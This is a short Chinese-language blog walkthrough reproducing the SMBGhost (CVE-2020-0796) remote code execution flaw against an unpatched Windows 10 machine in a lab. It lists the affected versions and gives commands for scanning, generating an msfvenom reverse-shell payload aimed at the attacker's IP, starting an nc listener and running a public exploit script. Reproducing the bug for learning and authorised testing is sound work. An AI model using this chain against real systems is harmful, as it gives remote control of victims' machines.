SMBGhost RCE(CVE-2020-0796)
作者 : Noth
前言 :
筆者在實戰的過程中,有掃出來存在 SMBGhost 的漏洞,不過目前還沒有成功彈回 shell,想說自己先在本地端復現後再拿去實戰,以後再打內網滲透又多了一招,不過其實進入到內網後大部份都還是在打 Web,聽朋友說最好是能一眼看到系統就可以 RCE,看來自己的實力真的還不夠,之後再回頭打 Web。
內文 :
在實戰當中可能會遇到防火牆的狀況,可能視情況自己修改 ShellCode,相關資訊一樣擺在 Reference。
影響範圍 :
Windows 10 Version 1903 (32與64位元)
Windows 10 Version 1909 (32與64位元)
Windows Server, version 1903
Windows Server, version 1909
實作環境 :
攻擊者 : 192.168.235.148 , kali
受害者 : 192.168.235.160 , Windows 10 Version 1903
查看主機是否存在漏洞 :
python scanner.py 192.168.235.160
msf 生成 reverse_shell 的 ShellCode :
msfvenom -a x64 --platform windows -p windows/x64/shell_reverse_tcp LHOST=192.168.235.148 LPORT=1234 -f python "USER_PAYLOAD"
將 exploit 的 payload 替換成生成的 ShellCode :
nc 監聽 :
nc -lvvp 1234
執行 exploit.py :
python exploit.py -ip 192.168.235.160
成功 reverse_shell :
其實筆者還有找到另一個 PoC,不過測了一陣子發現並沒有什用,難度是必須先在受害者主機執行 calc_target_offsets.bat,然後修改裡頭 Payload (光是這一點就有難度了xD),結果就是一直 Crash,後來在 github 看到它們說了一段話 : 「我們也認為 POC 不是通用的,並且不方便用於測試和教育以外的用途是一件好事」好吧,看來真的不通用 QQ,接下來就開始實作一下 AD 的攻擊手法。
Reference :
https://github.com/chompie1337/SMBGhost_RCE_PoC
https://mari0er.club/post/CVE-2020-0796.html/
https://github.com/ly4k/SMBGhost
留言
張貼留言